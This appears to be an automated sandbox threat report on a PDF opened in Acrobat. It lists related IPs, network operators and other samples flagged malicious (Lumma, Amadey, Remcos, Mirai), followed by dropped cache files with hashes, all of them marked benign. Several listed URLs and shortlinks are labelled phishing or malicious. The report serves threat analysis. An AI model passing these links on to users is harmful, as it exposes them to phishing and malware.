                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              23.192.223.236ddsfsfsa.pdfGet hashmaliciousUnknownBrowse
                                162.159.61.3pdfguruhub.msiGet hashmaliciousUnknownBrowse
                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                    specifications and technical requirements.pdfGet hashmaliciousHTMLPhisherBrowse
                                      https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                          DEMASI-24-12B DOC. SCAN.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            https://t.ly/D5x5UGet hashmaliciousBraodoBrowse
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                dyT8pWNPk7.exeGet hashmaliciousRemcosBrowse
                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    2.23.197.184scan3762399_arleen@wcctxlaw.com.pdfGet hashmaliciousUnknownBrowse
                                                      specifications and technical requirements.pdfGet hashmaliciousHTMLPhisherBrowse
                                                        https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                          https://t.ly/D5x5UGet hashmaliciousBraodoBrowse
                                                            Payslip Notification #5800210900 11112024.emlGet hashmaliciousUnknownBrowse
                                                              Completed 17560_Steamsolutions. 401(k) Profit Sharing Plan_Amendment.msgGet hashmaliciousHTMLPhisherBrowse
                                                                Attachment-551059325-009.pdfGet hashmaliciousUnknownBrowse
                                                                  Multi Graphics Inc CustomerVendor Form.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                    tjackson Payout File.pdfGet hashmaliciousUnknownBrowse
                                                                      Updated Document-9875488675.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                        93.184.221.240original.emlGet hashmaliciousUnknownBrowse
                                                                          Le55bnMCON.msiGet hashmaliciousAteraAgentBrowse
                                                                            kTbv9ZA2x0.msiGet hashmaliciousAteraAgentBrowse
                                                                              IwmwOaVHnd.msiGet hashmaliciousAteraAgentBrowse
                                                                                laudovisitabombeirosPdf.msiGet hashmaliciousAteraAgentBrowse
                                                                                  c54f4c04-95c8-e3ea-7c13-45cbc3ee9b45.emlGet hashmaliciousUnknownBrowse
                                                                                    Updated Document-9875488675.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                      http://seed.wavebrowser.coGet hashmaliciousUnknownBrowse
                                                                                        POP (2).pdfGet hashmaliciousUnknownBrowse
                                                                                          original.emlGet hashmaliciousMamba2FABrowse
                                                                                            No context
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            EDGECASTUShttps://www.tryinteract.com/share/quiz/673350c22861f600153c2f9cGet hashmaliciousUnknownBrowse
                                                                                            • 152.199.21.175
                                                                                            Malicious PDF.pdfGet hashmaliciousUnknownBrowse
                                                                                            • 152.199.21.175
                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 152.195.19.97
                                                                                            http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUM1RXUzBHU1RDUjlQOFBPUUE4QVRaS0pPSC4uGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 152.199.21.175
                                                                                            original.emlGet hashmaliciousUnknownBrowse
                                                                                            • 93.184.221.240
                                                                                            Salary Amendment.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 152.199.21.175
                                                                                            https://ampa.fi/uEvMZCXCvXGet hashmaliciousUnknownBrowse
                                                                                            • 152.199.21.175
                                                                                            https://geaggda.r.af.d.sendibt2.com/tr/cl/G6qLHi_vqRpNEshmo4Rb0Zi9wTI57XqpRBN9j8dsPzzZwRPQslplmE2NZOV7I4ZyAW8Debk1WJB4vkNN2b2Ymh_xzh3GM7ikV7zFXqNBPGLT_3-ggJ1kozgt2qpczQVJPoanMp2q8VT-Vfp9XDwlA87cx4lPh-ekGo3OmOH1GVhSoreRLRYcOy9-QIzMTEB73P_5lDdW91eGd493vzrT7eGGNz_RQDN5h33uL34k84Zf-XFIybIb1ttQkKbxN5hvQd_5dlX_y4d0yT_KM2VzPr3A0fcsmlHZu3_JktQ8T932jDkv1PITN5Lgv1rTUwsHy3-BpdBMpPjZn3kWrt6TUwpuIJwGTU-yHnFelsoNQCHzwfnGZP4YdL92LyxYOt8PNTGCg27gEMxuIa0RBwD9j9pVGZtxKbGjc3Wo2UqALFneGqf_QC3sGHFr_7zyM0y4CuE2Onwf1-lzIFO6utDvVOq2umljYXy_lJZV4bSKfZeWpWNQ09UKU9JwcRjyD8ICoL-6FiKlYs8puAlM5G8Sk4AqjR-IPw41iIHOdzVbSiJs3a5cnBHhyeO7jx42M7S8htsYpmaO2bMVea40frXVlQ3e3kgGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 152.199.21.175
                                                                                            View Pdf Doc_1c854e0875fca437af9ba7046d2f6712.htmGet hashmaliciousUnknownBrowse
                                                                                            • 152.199.21.175
                                                                                            https://t.ly/Bv1rGGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                            • 152.199.21.175
                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 172.67.150.243
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.150.243
                                                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            Scan_7619532.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 104.18.95.41
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.0.123
                                                                                            https://www.tryinteract.com/share/quiz/673350c22861f600153c2f9cGet hashmaliciousUnknownBrowse
                                                                                            • 1.1.1.1
                                                                                            EXT__Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825.emlGet hashmaliciousUnknownBrowse
                                                                                            • 104.17.24.14
                                                                                            pdfguruhub.msiGet hashmaliciousUnknownBrowse
                                                                                            • 162.159.61.3
                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 172.64.41.3
                                                                                            Yeni sipari#U015f _TR-59647-WJO-001.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 188.114.96.3
                                                                                            AKAMAI-ASUSyakuza.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                            • 104.78.68.173
                                                                                            meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                                                                            • 23.205.213.114
                                                                                            Scan_7619532.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 96.6.160.189
                                                                                            https://www.tryinteract.com/share/quiz/673350c22861f600153c2f9cGet hashmaliciousUnknownBrowse
                                                                                            • 2.19.126.198
                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 23.47.51.168
                                                                                            original.emlGet hashmaliciousUnknownBrowse
                                                                                            • 2.19.126.151
                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                            • 23.47.50.173
                                                                                            scan3762399_arleen@wcctxlaw.com.pdfGet hashmaliciousUnknownBrowse
                                                                                            • 184.28.88.176
                                                                                            specifications and technical requirements.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 23.38.98.80
                                                                                            https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                            • 184.28.88.176
                                                                                            CWVodafoneGroupPLCEUscan3762399_arleen@wcctxlaw.com.pdfGet hashmaliciousUnknownBrowse
                                                                                            • 2.23.197.184
                                                                                            specifications and technical requirements.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 2.23.197.184
                                                                                            https://t.ly/SjDNXGet hashmaliciousPython Stealer, BraodoBrowse
                                                                                            • 2.23.197.184
                                                                                            https://t.ly/D5x5UGet hashmaliciousBraodoBrowse
                                                                                            • 2.23.197.184
                                                                                            https://fnv.morsentutra.ru/DD8Q/Get hashmaliciousUnknownBrowse
                                                                                            • 2.23.196.132
                                                                                            Payslip Notification #5800210900 11112024.emlGet hashmaliciousUnknownBrowse
                                                                                            • 2.23.197.184
                                                                                            https://kh7hk7t867r6.s3.us-east-2.amazonaws.com/gyg87t8f7g7ff75d5/huu7t76r5trf5e45e/index.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 2.23.196.103
                                                                                            hiss.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                            • 194.63.11.114
                                                                                            hiss.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                            • 193.18.233.105
                                                                                            https://www.docusign.net/Signing/EmailStart.aspx?a=bee32ac6-9e7b-46bc-b1a7-7d20209f168e&etti=24&acct=60e19a9b-9a1c-4a80-be2d-f078553cd3fb&er=7cd6fca8-f673-43e6-aa59-6aa11160dad4Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 2.23.209.182
                                                                                            No context
                                                                                            No context
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7263231095604342
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0M:9JZj5MiKNnNhoxud
                                                                                            MD5:32BC6CC4C81AE03AB73AD8FF8D3B86A3
                                                                                            SHA1:D207900440DBEB1FB5AC52625B139A37FEA15A4E
                                                                                            SHA-256:8B808C35F270028A37E23A7D09FFB607A2742FD5984406C2D9001AEF8279C09E
                                                                                            SHA-512:70DBC51016BB2B350BC90533165E9B1E93EF14837BAF3ED3CC8ABFD10ACAF37137D7FCA8B050926268848B299B06E0EE975BAD851241A379EA426B4B97634EFC
                                                                                            Malicious:false
                                                                                            Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x6d5785e7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7556118098870623
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:lSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:lazaSvGJzYj2UlmOlOL
                                                                                            MD5:01C793195F01825CD79B1344BC1A0BA6
                                                                                            SHA1:96B5A4F79191F002159851DA34BD7D0F63C87943
                                                                                            SHA-256:5925B1EF6EB54034C1CB7AF92EF6DC688B411F06556DEAC18FF6005B51EB1C20
                                                                                            SHA-512:46D9861E705E1048F5069FA75B6E9CFA65A20E6EAFCBEEEF94A576481684EBB173FFAFE2896E3D0A2C5A39EDA6CC99E591E656B5FCCA2E7CEC4FE788EE9E21ED
                                                                                            Malicious:false
                                                                                            Preview:mW..... .......7.......X\...;...{......................0.e......!...{?......|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...........................................|;.................`........|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.07939628952643035
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:O6YeUepuZsEeeuNaAPaU1l6hW+ltlolluxmO+l/SNxOf:BzifBuNDPaUSegmOH
                                                                                            MD5:CF0A931678B1C5DAAB77B56D54891443
                                                                                            SHA1:BE8B138009DE72D045725AAC228DC97C3D92DC7D
                                                                                            SHA-256:B08A3FA1E1D7047C589742460F711C2EB941ACDFAC0609B2F11E3CC3F1BEEAF3
                                                                                            SHA-512:FDE6D884AC93F7EE0F6F8D854F2E85402B4B59156BF5C912F6D807D08490B0721AD43AEAE2E3725BFA63F2C50AC3FA20E3FAFEBCC43D45AB1BE5AD64A4134B92
                                                                                            Malicious:false
                                                                                            Preview:.........................................;...{.......|...!...{?..........!...{?..!...{?..g...!...{?.................`........|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):295
                                                                                            Entropy (8bit):5.140253586564984
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:HU+oTq2PN72nKuAl9OmbnIFUt8YU+ooZZmw+YU+oDXkwON72nKuAl9OmbjLJ:foTvVaHAahFUt8gooZ/+goDX5OaHAaSJ
                                                                                            MD5:64E0555349F3B61308FF3D6D0071AA19
                                                                                            SHA1:BFC1F60B9EDAD661B10F9CE81B61CF1E030E4C71
                                                                                            SHA-256:E20AFF334A4C35438DFF7EE43F619D7876EF4837314164B87A34F3CBFF0E5F4F
                                                                                            SHA-512:749B039605275705F2DC14FD05001D3D66253A35F2208B166F06046370E0A8354E8CB972EA7BEC393EF8814E0E95EAD2611CBCCD2060D058833380984AC3BE7F
                                                                                            Malicious:false
                                                                                            Preview:2024/11/12-16:12:06.142 3f0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/12-16:12:06.144 3f0 Recovering log #3.2024/11/12-16:12:06.145 3f0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):295
                                                                                            Entropy (8bit):5.140253586564984
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:HU+oTq2PN72nKuAl9OmbnIFUt8YU+ooZZmw+YU+oDXkwON72nKuAl9OmbjLJ:foTvVaHAahFUt8gooZ/+goDX5OaHAaSJ
                                                                                            MD5:64E0555349F3B61308FF3D6D0071AA19
                                                                                            SHA1:BFC1F60B9EDAD661B10F9CE81B61CF1E030E4C71
                                                                                            SHA-256:E20AFF334A4C35438DFF7EE43F619D7876EF4837314164B87A34F3CBFF0E5F4F
                                                                                            SHA-512:749B039605275705F2DC14FD05001D3D66253A35F2208B166F06046370E0A8354E8CB972EA7BEC393EF8814E0E95EAD2611CBCCD2060D058833380984AC3BE7F
                                                                                            Malicious:false
                                                                                            Preview:2024/11/12-16:12:06.142 3f0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/12-16:12:06.144 3f0 Recovering log #3.2024/11/12-16:12:06.145 3f0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):342
                                                                                            Entropy (8bit):5.126458492184855
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:HU+8L+q2PN72nKuAl9Ombzo2jMGIFUt8YU+klM1Zmw+YU+klaLVkwON72nKuAl97:fs+vVaHAa8uFUt8gk21/+gkAV5OaHAaU
                                                                                            MD5:725AE5CC5EA962A9EB4B9481AC0E8D07
                                                                                            SHA1:AA9A72EFC6FA26757594496A8575CE54CA4705DE
                                                                                            SHA-256:8DFDB2BEC1EF2FA9C556C91B3A99555165EE7F78961A9558B22C3C26C4744CDF
                                                                                            SHA-512:0B03678DBCD8C01506A376DA4051F53DDDB67637389E35021C75A63FC366DE13B3B38BC8A5B7898D4B1F6A6CFDAC68DD2E98E05E77BFFD899F91513B2B74C4C4
                                                                                            Malicious:false
                                                                                            Preview:2024/11/12-16:12:06.179 1c9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/12-16:12:06.181 1c9c Recovering log #3.2024/11/12-16:12:06.181 1c9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):342
                                                                                            Entropy (8bit):5.126458492184855
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:HU+8L+q2PN72nKuAl9Ombzo2jMGIFUt8YU+klM1Zmw+YU+klaLVkwON72nKuAl97:fs+vVaHAa8uFUt8gk21/+gkAV5OaHAaU
                                                                                            MD5:725AE5CC5EA962A9EB4B9481AC0E8D07
                                                                                            SHA1:AA9A72EFC6FA26757594496A8575CE54CA4705DE
                                                                                            SHA-256:8DFDB2BEC1EF2FA9C556C91B3A99555165EE7F78961A9558B22C3C26C4744CDF
                                                                                            SHA-512:0B03678DBCD8C01506A376DA4051F53DDDB67637389E35021C75A63FC366DE13B3B38BC8A5B7898D4B1F6A6CFDAC68DD2E98E05E77BFFD899F91513B2B74C4C4
                                                                                            Malicious:false
                                                                                            Preview:2024/11/12-16:12:06.179 1c9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/12-16:12:06.181 1c9c Recovering log #3.2024/11/12-16:12:06.181 1c9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:modified
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.967105522201735
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqFsBdOg2HpCcaq3QYiubcP7E4T3y:Y2sRdsXdMHpN3QYhbA7nby
                                                                                            MD5:47DC5E644ADD5ED85ED44E3F8176A7FC
                                                                                            SHA1:6CEFB5327DA79E0FF7D71724B454451E8E2D89DD
                                                                                            SHA-256:619D5FBEE5845DBA8F4A83BBEDBD314D9138A50063182489B5B9BAEF2B16752E
                                                                                            SHA-512:57612F058EF9DBC96151E49FA97509143DAA71B9E0F2D3BB6B447C5E0F1B5DF79D9BAF37B2CC2DDCCCC7C190731BE082B334659BE607DF5057E94026638D07F0
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376005936311603","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":239118},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):475
                                                                                            Entropy (8bit):4.967105522201735
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqFsBdOg2HpCcaq3QYiubcP7E4T3y:Y2sRdsXdMHpN3QYhbA7nby
                                                                                            MD5:47DC5E644ADD5ED85ED44E3F8176A7FC
                                                                                            SHA1:6CEFB5327DA79E0FF7D71724B454451E8E2D89DD
                                                                                            SHA-256:619D5FBEE5845DBA8F4A83BBEDBD314D9138A50063182489B5B9BAEF2B16752E
                                                                                            SHA-512:57612F058EF9DBC96151E49FA97509143DAA71B9E0F2D3BB6B447C5E0F1B5DF79D9BAF37B2CC2DDCCCC7C190731BE082B334659BE607DF5057E94026638D07F0
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376005936311603","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":239118},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):5449
                                                                                            Entropy (8bit):5.24591038031698
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7QGV9Y:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhE
                                                                                            MD5:1DF3253877A6471AF05C4D6FA85C2D8D
                                                                                            SHA1:CDA04D999E195640C9E8AA295EFD55481976C4EC
                                                                                            SHA-256:C3862CA8D3B3AD0F05E244D30FAA942156F0B1842CA7B214D13DE4903AB6DFCF
                                                                                            SHA-512:F46B06F562F6BBBD31D9A6736572A53C0E81EE0DE16E98FF5971EC426383BA941553E580E4253A0CF4379AD8A709C8E025DAE339041EC14E4BE08B4A7F96D14F
                                                                                            Malicious:false
                                                                                            Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):330
                                                                                            Entropy (8bit):5.155991051982178
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:HU+MUaL+q2PN72nKuAl9OmbzNMxIFUt8YU+mfl1Zmw+YU+mfzLVkwON72nKuAl9c:fQ+vVaHAa8jFUt8gmN1/+gmfV5OaHAab
                                                                                            MD5:8F0164938BA6D1A0CD4EDD90FA3E0FDF
                                                                                            SHA1:76A4973193C0DEB82ADF9484ECE7F504DAFD7668
                                                                                            SHA-256:0C02A79FAEEA503D3F629A90A613E44687DFE4732C84E38A8D2ADCB27E329136
                                                                                            SHA-512:5EBEB641F3B363C5B837410005277EF51435DE8790DADCF058933998BD3354510ABA5B7EDD1090F31CBF06FA1FD6E8B2A13D030AE81776F9E5C8383314BF1569
                                                                                            Malicious:false
                                                                                            Preview:2024/11/12-16:12:06.283 1c9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/12-16:12:06.285 1c9c Recovering log #3.2024/11/12-16:12:06.285 1c9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):330
                                                                                            Entropy (8bit):5.155991051982178
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:HU+MUaL+q2PN72nKuAl9OmbzNMxIFUt8YU+mfl1Zmw+YU+mfzLVkwON72nKuAl9c:fQ+vVaHAa8jFUt8gmN1/+gmfV5OaHAab
                                                                                            MD5:8F0164938BA6D1A0CD4EDD90FA3E0FDF
                                                                                            SHA1:76A4973193C0DEB82ADF9484ECE7F504DAFD7668
                                                                                            SHA-256:0C02A79FAEEA503D3F629A90A613E44687DFE4732C84E38A8D2ADCB27E329136
                                                                                            SHA-512:5EBEB641F3B363C5B837410005277EF51435DE8790DADCF058933998BD3354510ABA5B7EDD1090F31CBF06FA1FD6E8B2A13D030AE81776F9E5C8383314BF1569
                                                                                            Malicious:false
                                                                                            Preview:2024/11/12-16:12:06.283 1c9c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/12-16:12:06.285 1c9c Recovering log #3.2024/11/12-16:12:06.285 1c9c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 12, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 12
                                                                                            Category:dropped
                                                                                            Size (bytes):86016
                                                                                            Entropy (8bit):4.444763800175642
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:ie9ci5tPiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:5Es3OazzU89UTTgUL
                                                                                            MD5:7E542FAE52B6F733B5F3D012AF123B39
                                                                                            SHA1:CFE359C0F4B65E8FF3D68EFFF0FF08F64E01C16D
                                                                                            SHA-256:1158A45709FF69FAB83D65AA7174D36FE7CE117ED90737A72431960974A61D12
                                                                                            SHA-512:4345994A0CC95FBD13423832A13B11E4592D04A158EF57FB58B73DFF30E05B297B07483259670B5B5A80CD424792AEBFAD966E79735050C364BE8E6A7D601A5C
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite Rollback Journal
                                                                                            Category:dropped
                                                                                            Size (bytes):8720
                                                                                            Entropy (8bit):2.21152717009361
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:7+tSnnuwK3qL0MzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9c:7M2nC3q/mFTIF3XmHjBoGGR+jMz+LhG
                                                                                            MD5:9046DC0626EBD20DEC6DC590BCE454C4
                                                                                            SHA1:8AE82D9FE215718F5A5DAC592D660A92C4D92ADD
                                                                                            SHA-256:F6EF7FAAD172112F1CD5FF95791205CACE7BEA5BED5DE55FC7F55A7C250BF455
                                                                                            SHA-512:10D8194F7E9EBF573AEF7E7F0AA42A9CDC00B9339106F1CF0C842BCDBC92852D6F92F1D99DBDB1EBAAFFFA822B409D3BC5C594653B167FF567815837683BD9D5
                                                                                            Malicious:false
                                                                                            Preview:.... .c.....;An.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:Certificate, Version=3
                                                                                            Category:dropped
                                                                                            Size (bytes):1391
                                                                                            Entropy (8bit):7.705940075877404
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                            Malicious:false
